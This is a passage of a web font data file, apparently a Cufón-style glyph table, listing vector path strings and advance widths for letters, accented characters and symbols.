,-191xm68,-288r-7,67r-35,0r-7,-67r49,0xm-9,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22xm96,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22","w":86},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152xm146,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30"},{"d":"113,-153v-58,0,-37,92,-41,153r-48,0r0,-191r48,0r0,22v24,-35,100,-36,116,7v14,-19,34,-33,64,-34v88,-3,61,112,65,196r-48,0v-7,-54,21,-153,-33,-153v-59,0,-37,93,-41,153r-48,0v-6,-56,20,-153,-34,-153","w":338},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm83,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":230},{"d":"29,-259r129,0r0,49r-80,0r0,210r-49,0r0,-259","w":166},{"d":"110,-328r0,237r150,0r0,31r-180,0r0,-268r30,0xm177,-158r83,0r0,31r-114,0r0,-201r31,0r0,170","w":256},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112","w":223},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259xm149,-347r57,0r-65,69r-34,0","w":266},{"d":"197,-61v3,71,-75,62,-147,61r0,-149r-46,0r0,-42r94,0r0,69v60,-4,97,9,99,61xm98,-37v26,1,47,0,48,-22v2,-24,-23,-25,-48,-24r0,46","w":209},{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49","w":151},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm143,-347r42,69r-34,0r-65,-69r57,0","w":302},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm-14,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm64,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":100},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-21,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm57,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":86},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0xm90,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":323},{"d":"20,-151r176,0r0,44r-176,0r0,-44"},{"d":"25,-265r49,0r0,189r-49,0r0,-189xm129,-265r49,0r0,189r-49,0r0,-189xm19,-25v0,-17,14,-30,30,-30v17,0,31,13,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30xm123,-25v0,-15,15,-30,30,-30v17,0,31,13,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30","w":202},{"d":"37,-36v-53,-61,-6,-160,83,-160v37,0,71,19,86,43r-40,22v-31,-36,-103,-25,-103,29v0,73,122,40,122,116v0,55,-58,72,-112,55r11,-42v15,5,55,13,54,-10v0,-7,-8,-14,-26,-18v-35,-8,-61,-18,-75,-35","w":210},{"d":"105,-265r35,0v1,29,-5,49,-20,68r-14,-11v8,-9,12,-18,13,-27r-14,0r0,-30xm30,-262r48,0r0,71r28,0r0,41r-28,0r0,150r-48,0r0,-150r-25,0r0,-41r25,0r0,-71","w":129},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm36,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm114,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":187},{"d":"13,-259r55,0r54,83r55,-83r55,0r-82,126r87,133r-55,0r-60,-91r-59,91r-56,0r88,-133","w":244},{"d":"4,-191r49,0r48,113r48,-113r49,0r-82,191r-31,0","w":201},{"d":"58,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259xm32,-265r-7,67r-35,0r-7,-67r49,0","w":273},{"d":"10,-259r50,0r66,184r65,-184r51,0r-93,259r-48,0","w":252},{"d":"15,-95v0,98,140,135,195,60r-38,-26v-26,34,-93,31,-106,-15r64,0r0,-41r-64,0v18,-41,74,-46,106,-14r40,-22v-55,-79,-197,-42,-197,58","w":224},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152xm114,-295r57,0r-65,69r-34,0"},{"d":"78,-42v16,0,16,-13,16,-36r0,-181r49,0r0,172v16,104,-91,118,-136,56r35,-33v12,13,18,22,36,22","w":172},{"d":"222,-79v0,50,-32,79,-90,79r-72,0r0,-212r-58,0r0,-47r107,0r0,98v68,-4,113,22,113,82xm109,-47v35,0,64,0,64,-33v0,-27,-26,-39,-64,-37r0,70","w":235},{"d":"196,-189r0,44r-132,0r0,75r-44,0r0,-119r176,0"},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259","w":158},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm107,-295r42,69r-34,0r-65,-69r57,0","w":230},{"d":"96,-191v49,-16,53,-20,99,-50r5,2v4,42,13,78,28,108r-4,3v-17,-22,-30,-46,-39,-73r-52,111v24,9,51,42,51,76v0,44,-38,74,-81,74v-46,0,-85,-37,-85,-81v0,-52,53,-94,107,-72r51,-112v-25,11,-52,16,-80,18r0,-4xm162,-21v0,-38,-33,-70,-69,-70v-36,-1,-68,32,-68,67v-1,38,32,70,69,70v37,0,68,-31,68,-67","w":240},{"d":"113,109r0,-437r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0","w":256},{"d":"260,-94r-180,0r0,-234r30,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31","w":256},{"d":"110,109r-30,0r0,-267r180,0r0,31r-150,0r0,236xm177,-60r0,169r-31,0r0,-200r114,0r0,31r-83,0","w":256},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm83,-278r0,-39r101,0r0,39r-101,0","w":266},{"d":"37,-158v-36,-66,36,-132,105,-98v22,11,36,33,36,63r-50,0v-3,-38,-51,-33,-50,1v0,8,7,25,10,34r60,0r0,44r-47,0v5,28,1,39,-10,69v22,4,52,11,56,-14r45,0v-2,37,-29,66,-67,66v-32,0,-72,-14,-100,-1r-16,-42v10,-4,19,-7,28,-8v13,-21,18,-39,15,-70r-43,0r0,-44r28,0","w":201},{"d":"306,-249r0,254r-255,-127","w":356},{"d":"7,-191r56,0r37,52r38,-52r55,0r-65,90r73,101r-55,0r-46,-63r-45,63r-55,0r73,-101","w":201},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm52,-295r57,0r-65,69r-34,0","w":86},{"d":"19,-201v-9,-64,31,-79,80,-62r0,36v-18,-5,-32,-7,-32,19r0,208r-48,0r0,-201","w":86},{"d":"79,109r0,-203r-82,0r0,-31r82,0r0,-203r31,0r0,437r-31,0xm146,109r0,-437r31,0r0,437r-31,0","w":256},{"d":"24,-191r77,0r0,-28r45,0r0,73r-74,0r0,146r-48,0r0,-191","w":154},{"d":"260,109r-263,0r0,-218r263,0r0,218","w":256},{"d":"79,109r0,-203r-82,0r0,-31r263,0r0,31r-83,0r0,203r-31,0r0,-200r-36,0r0,200r-31,0","w":256},{"d":"196,-64r0,44r-176,-90r0,-39r176,-89r0,44r-125,65"},{"d":"22,0r0,-172r172,0r0,172r-172,0xm108,-51v19,0,35,-16,35,-35v0,-19,-16,-36,-35,-36v-19,0,-36,17,-36,36v0,19,17,35,36,35"},{"d":"146,109r0,-437r31,0r0,437r-31,0xm110,-328r0,201r-113,0r0,-31r82,0r0,-170r31,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169","w":256},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm81,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31"},{"d":"15,-89v0,-52,32,-102,84,-101v28,0,50,14,67,41v1,-10,4,-23,8,-36r50,0v-17,56,-15,129,3,185r-50,0v-4,-14,-8,-27,-10,-40v-36,79,-152,47,-152,-49xm163,-96v0,-33,-16,-61,-48,-61v-35,0,-48,29,-48,66v0,37,16,62,47,62v33,0,49,-31,49,-67","w":237},{"d":"260,-94r-263,0r0,-31r116,0r0,-203r31,0r0,203r116,0r0,31","w":256},{"d":"100,-288r-7,67r-35,0r-7,-67r49,0xm23,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22xm128,-266v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22","w":151},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152xm182,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17"},{"d":"146,109r0,-236r-149,0r0,-31r180,0r0,267r-31,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169","w":256},{"d":"159,-285r13,0r0,59v22,1,42,9,61,25r51,-50r9,9r-50,51v16,21,25,42,25,63r59,0r0,12r-59,0v-2,22,-10,42,-25,61r50,51r-10,9r-50,-49v-20,15,-40,22,-61,24r0,59r-13,0r0,-59v-24,-3,-44,-11,-61,-24r-52,49r-9,-9r50,-51v-15,-18,-23,-39,-25,-62r-59,0r0,-12r59,0v2,-23,10,-43,25,-61r-50,-51r9,-10r51,50v21,-15,42,-24,62,-25r0,-59xm165,-33v48,0,90,-42,90,-90v0,-48,-42,-90,-90,-90v-48,0,-90,42,-90,90v0,48,42,90,90,90","w":330},{"d":"113,-94r-116,0r0,-31r116,0r0,-203r31,0r0,203r116,0r0,31r-116,0r0,203r-31,0r0,-203","w":256},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259xm147,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":223},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm32,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":208},{"d":"221,-81v3,46,75,58,101,25r40,19v-21,41,-103,57,-144,23r0,14r-44,0r0,-24v-49,63,-167,13,-158,-71v-8,-81,108,-138,158,-71r0,-25r44,0r0,14v68,-48,168,2,157,96r-154,0xm327,-119v-8,-46,-95,-48,-104,0r104,0xm175,-97v0,-31,-23,-56,-55,-56v-31,0,-55,25,-55,58v0,31,23,56,55,56v34,0,55,-25,55,-58xm204,-295r57,0r-65,69r-34,0","w":388},{"d":"70,-270v66,87,68,260,0,345r-61,0v39,-45,62,-92,62,-171v0,-81,-21,-123,-62,-174r61,0","w":136},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm113,-60r-116,0r0,-31r263,0r0,31r-116,0r0,169r-31,0r0,-169","w":256},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"81,7r110,-272r30,0r-110,272r-30,0xm81,-171v0,-18,-24,-24,-37,-11r-27,-5r19,-75r75,0r0,27r-50,0r-5,19v32,-3,58,15,58,44v2,55,-99,62,-109,9r34,0v8,15,43,13,42,-8xm240,-136v38,0,66,39,34,64v41,23,17,81,-33,75v-50,6,-77,-51,-35,-75v-31,-24,-5,-64,34,-64xm240,-83v9,0,16,-6,16,-14v0,-8,-6,-12,-17,-12v-8,1,-14,4,-14,12v0,8,6,14,15,14xm218,-40v0,10,10,16,22,16v15,0,22,-6,22,-16v0,-11,-10,-17,-21,-17v-10,0,-23,6,-23,17","w":302},{"d":"128,109r0,-437r132,0r0,437r-132,0","w":256},{"d":"218,-126v0,-52,-24,-91,-69,-92v-25,0,-48,16,-70,47r0,171r-50,0r0,-259r50,0r0,28v71,-81,189,-6,189,102v0,85,-53,164,-136,127v-11,-5,-21,-15,-31,-29r35,-33v11,15,22,23,34,23v34,-2,48,-45,48,-85","w":285},{"d":"19,-328r22,0r0,22r-22,0r0,-22xm106,-328r22,0r0,22r-22,0r0,-22xm194,-328r22,0r0,22r-22,0r0,-22xm63,-284r22,0r0,22r-22,0r0,-22xm150,-284r22,0r0,22r-22,0r0,-22xm238,-284r22,0r0,22r-22,0r0,-22xm194,-240r22,0r0,22r-22,0r0,-22xm106,-240r22,0r0,22r-22,0r0,-22xm19,-240r22,0r0,22r-22,0r0,-22xm238,-196r22,0r0,22r-22,0r0,-22xm150,-196r22,0r0,22r-22,0r0,-22xm63,-196r22,0r0,22r-22,0r0,-22xm19,-152r22,0r0,22r-22,0r0,-22xm106,-152r22,0r0,22r-22,0r0,-22xm194,-152r22,0r0,22r-22,0r0,-22xm238,-109r22,0r0,22r-22,0r0,-22xm150,-109r22,0r0,22r-22,0r0,-22xm63,-109r22,0r0,22r-22,0r0,-22xm19,-65r22,0r0,22r-22,0r0,-22xm106,-65r22,0r0,22r-22,0r0,-22xm194,-65r22,0r0,22r-22,0r0,-22xm63,-21r22,0r0,22r-22,0r0,-22xm150,-21r22,0r0,22r-22,0r0,-22xm238,-21r22,0r0,22r-22,0r0,-22xm194,23r22,0r0,22r-22,0r0,-22xm106,23r22,0r0,22r-22,0r0,-22xm19,23r22,0r0,22r-22,0r0,-22xm63,67r22,0r0,22r-22,0r0,-22xm150,67r22,0r0,22r-22,0r0,-22xm238,67r22,0r0,22r-22,0r0,-22","w":256},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100","w":230},{"d":"19,-265r48,0r0,265r-48,0r0,-265xm45,-347r57,0r-65,69r-34,0","w":86},{"d":"26,-166r166,0r0,166r-166,0r0,-166xm39,-153r0,140r139,0r0,-140r-139,0","w":217},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm90,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":187},{"d":"60,-237v-12,0,-20,9,-20,21r-33,0v-4,-60,105,-65,105,-9v0,32,-28,49,-49,69r50,0r0,27r-110,0r0,-15v24,-25,65,-44,76,-79v-1,-9,-8,-14,-19,-14","w":120},{"d":"53,33v0,-43,53,-65,93,-42r0,-201r164,-51r0,228v2,48,-21,67,-63,69v-31,1,-49,-18,-50,-46v0,-43,52,-65,93,-42r0,-149r-123,38r0,172v1,45,-22,69,-65,70v-28,0,-49,-18,-49,-46","w":360},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,437r-31,0r0,-169","w":256},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm69,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm147,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":266},{"d":"344,-78v0,74,-66,83,-147,78r-72,-190r-72,190r-53,0r100,-259r50,0r41,98v86,-6,153,5,153,83xm232,-47v37,0,63,1,63,-33v0,-37,-47,-39,-90,-37","w":357},{"d":"129,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152xm-9,-265r45,0v2,45,-4,73,-25,99r-18,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":231},{"d":"17,-129v-6,-112,132,-175,212,-107r0,-23r137,0r0,49r-87,0r0,47r87,0r0,47r-87,0r0,68r87,0r0,48r-137,0r0,-24v-22,18,-44,31,-81,31v-79,0,-127,-56,-131,-136xm229,-128v-1,-51,-32,-89,-82,-90v-44,-1,-82,42,-81,89v1,52,33,86,84,88v46,1,80,-40,79,-87","w":381},{"d":"0,-124r360,0r0,68r-360,0r0,-68","w":360},{"d":"189,-145v-64,45,-128,-51,-181,3r0,-56v68,-48,120,54,181,-4r0,57xm189,-60v-64,45,-128,-52,-181,3r0,-56v68,-48,119,54,181,-4r0,57","w":197},{"d":"59,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm32,-265r-7,67r-35,0r-7,-67r49,0","w":215},{"d":"54,-259r49,0r59,181r61,-181r48,0r43,259r-47,0r-28,-163r-55,163r-44,0r-54,-163r-28,163r-48,0","w":323},{"d":"68,-139v1,48,20,81,55,96r0,43r-113,0r0,-40v25,0,47,3,71,4v-40,-19,-67,-49,-67,-107v0,-73,50,-121,123,-121v82,0,128,45,128,121v0,55,-26,89,-67,106r71,-4r0,41r-113,0r0,-43v36,-15,53,-47,54,-95v2,-52,-26,-88,-72,-88v-44,0,-71,38,-70,87","w":276},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm81,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":230},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0","w":323},{"d":"260,-94r-263,0r0,-31r263,0r0,31","w":256},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55xm93,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":237},{"d":"191,-79v3,83,-78,82,-162,79r0,-259r136,0r0,48r-86,0r0,50v69,-4,109,21,112,82xm79,-47v37,0,64,-1,64,-32v0,-28,-25,-40,-64,-38r0,70","w":204},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138xm127,-303v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":302},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm117,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":86},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58xm84,-295r57,0r-65,69r-34,0","w":158},{"d":"22,-259r169,0r0,26r-116,240r-42,-21r97,-198r-108,0r0,-47","w":201},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm76,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":280},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm68,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":187},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169xm146,109r0,-200r114,0r0,31r-83,0r0,169r-31,0","w":256},{"d":"191,-79v0,53,-32,79,-89,79r-73,0r0,-259r50,0r0,98v68,-4,112,21,112,82xm79,-47v37,0,63,1,63,-33v0,-27,-25,-39,-63,-37r0,70","w":204},{"d":"300,0r-276,0r0,-191r48,0r0,145r66,0r0,-145r48,0r0,145r66,0r0,-145r48,0r0,191","w":324},{"d":"263,-262r0,66r-22,0r0,22r22,0r0,65r-22,0r0,22r22,0r0,66r-22,0r0,22r22,0r0,66r-22,0r0,22r22,0r0,21r-263,0r0,-65r22,0r0,-22r-22,0r0,-66r22,0r0,-22r-22,0r0,-65r22,0r0,-22r-22,0r0,-66r22,0r0,-22r-22,0r0,-66r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r21,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,44r-22,0r0,22r22,0xm22,-284r0,22r22,0r0,-22r-22,0xm66,-284r0,22r22,0r0,-22r-22,0xm110,-284r0,22r21,0r0,-22r-21,0xm153,-284r0,22r22,0r0,-22r-22,0xm197,-284r0,22r22,0r0,-22r-22,0xm241,-240r-22,0r0,22r22,0r0,-22xm197,-240r-22,0r0,22r22,0r0,-22xm153,-240r-22,0r0,22r22,0r0,-22xm110,-240r-22,0r0,22r22,0r0,-22xm66,-240r-22,0r0,22r22,0r0,-22xm22,-196r0,22r22,0r0,-22r-22,0xm66,-196r0,22r22,0r0,-22r-22,0xm110,-196r0,22r21,0r0,-22r-21,0xm153,-196r0,22r22,0r0,-22r-22,0xm197,-196r0,22r22,0r0,-22r-22,0xm66,-152r-22,0r0,22r22,0r0,-22xm88,-152r0,22r22,0r0,-22r-22,0xm131,-152r0,22r22,0r0,-22r-22,0xm175,-152r0,22r22,0r0,-22r-22,0xm219,-152r0,22r22,0r0,-22r-22,0xm22,-109r0,22r22,0r0,-22r-22,0xm110,-109r0,22r21,0r0,-22r-21,0xm88,-87r0,-22r-22,0r0,22r22,0xm153,-109r0,22r22,0r0,-22r-22,0xm197,-109r0,22r22,0r0,-22r-22,0xm241,-43r0,-22r-22,0r0,22r22,0xm197,-43r0,-22r-22,0r0,22r22,0xm153,-43r0,-22r-22,0r0,22r22,0xm110,-43r0,-22r-22,0r0,22r22,0xm66,-43r0,-22r-22,0r0,22r22,0xm22,-21r0,22r22,0r0,-22r-22,0xm66,-21r0,22r22,0r0,-22r-22,0xm110,-21r0,22r21,0r0,-22r-21,0xm153,-21r0,22r22,0r0,-22r-22,0xm197,-21r0,22r22,0r0,-22r-22,0xm241,45r0,-22r-22,0r0,22r22,0xm197,45r0,-22r-22,0r0,22r22,0xm153,45r0,-22r-22,0r0,22r22,0xm110,45r0,-22r-22,0r0,22r22,0xm66,45r0,-22r-22,0r0,22r22,0xm22,67r0,22r22,0r0,-22r-22,0xm66,67r0,22r22,0r0,-22r-22,0xm110,67r0,22r21,0r0,-22r-21,0xm153,67r0,22r22,0r0,-22r-22,0xm197,67r0,22r22,0r0,-22r-22,0","w":262},{"d":"69,-59v3,30,43,25,64,5r22,37v-39,38,-142,28,-140,-37v0,-23,12,-39,36,-48v-53,-26,-21,-94,38,-94v20,0,38,7,55,20r-19,33v-21,-16,-48,-17,-52,8v-2,16,15,21,34,20r0,34v-21,-2,-40,3,-38,22","w":157},{"d":"107,-172v4,-56,97,-57,95,0v-1,36,-14,47,-37,78v-32,43,-53,75,-58,98v-12,-52,-61,-94,-90,-146v-18,-34,3,-74,39,-74v24,0,41,15,51,44","w":212},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"128,-76v-64,2,-122,-2,-120,-64r0,-51r49,0v1,35,-10,76,33,72r38,0r0,-72r48,0r0,191r-48,0r0,-76","w":200},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55xm142,-219r-45,0v-2,-45,4,-74,25,-99r18,13v-8,12,-12,19,-16,35r18,0r0,51","w":237},{"d":"20,-194r0,-44r176,89r0,39r-176,90r0,-44r126,-65"},{"d":"294,-88v0,81,-98,126,-140,65v-43,61,-140,15,-140,-65v0,-66,47,-107,112,-109r3,46v-45,6,-67,26,-67,63v0,33,13,50,38,50v28,0,33,-36,31,-72r47,0v-2,36,3,72,31,72v25,0,37,-17,37,-50v0,-44,-25,-57,-67,-63r4,-46v65,2,111,44,111,109","w":308},{"d":"67,-265v55,9,125,21,171,-5r35,0r-205,288r-35,0r175,-247v-27,5,-52,6,-81,4v16,43,-17,83,-58,83v-34,0,-63,-28,-62,-61v0,-36,27,-59,60,-62xm99,-203v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,14,29,30,29v16,0,30,-14,30,-29xm179,-55v0,-33,29,-62,61,-62v33,0,62,29,62,62v0,33,-29,62,-62,62v-33,0,-61,-29,-61,-62xm270,-55v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,30,-15,30,-30","w":309},{"d":"-25,-226r53,-50r38,0r53,50r-53,0r-19,-23r-19,23r-53,0xm-15,30v19,10,38,6,38,-20r0,-201r48,0r0,197v4,63,-35,80,-86,62r0,-38","w":93},{"d":"23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"303,-244r-125,249r-125,-249r250,0","w":356},{"d":"24,-191r48,0r0,71r66,-71r59,0r-85,93r86,98r-64,0r-57,-68v-11,13,-2,46,-5,68r-48,0r0,-191","w":193},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm100,-295r42,69r-34,0r-65,-69r57,0"},{"d":"107,-230v-23,0,-28,12,-40,33r-24,-15v10,-30,30,-50,65,-50v48,0,64,43,64,96v0,81,-29,168,-109,170v-34,0,-56,-25,-55,-62v4,-71,59,-109,137,-108v0,-36,-9,-64,-38,-64xm48,-59v0,42,47,35,68,3v13,-19,22,-43,27,-77v-55,-3,-95,26,-95,74","w":177},{"d":"146,109r0,-437r31,0r0,437r-31,0xm80,109r0,-437r30,0r0,437r-30,0","w":256},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0","w":230},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm44,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm122,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25"},{"d":"27,-185v31,-28,50,-51,58,-72r9,0v10,22,29,47,59,73r0,13v-24,-11,-42,-22,-54,-34r0,280r-18,0r0,-280v-16,13,-34,25,-54,34r0,-14","w":180},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm90,-251v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":230},{"d":"141,-189r46,0r0,44r-65,0r-13,31r78,0r0,44r-97,0r-33,77r-33,0r32,-77r-45,0r0,-44r64,0r13,-31r-77,0r0,-44r96,0r33,-76r34,0","w":197},{"d":"141,-71r59,-120r32,0r47,191r-46,0r-26,-112r-57,112r-20,0r-55,-112r-26,112r-47,0r48,-191r32,0","w":281},{"d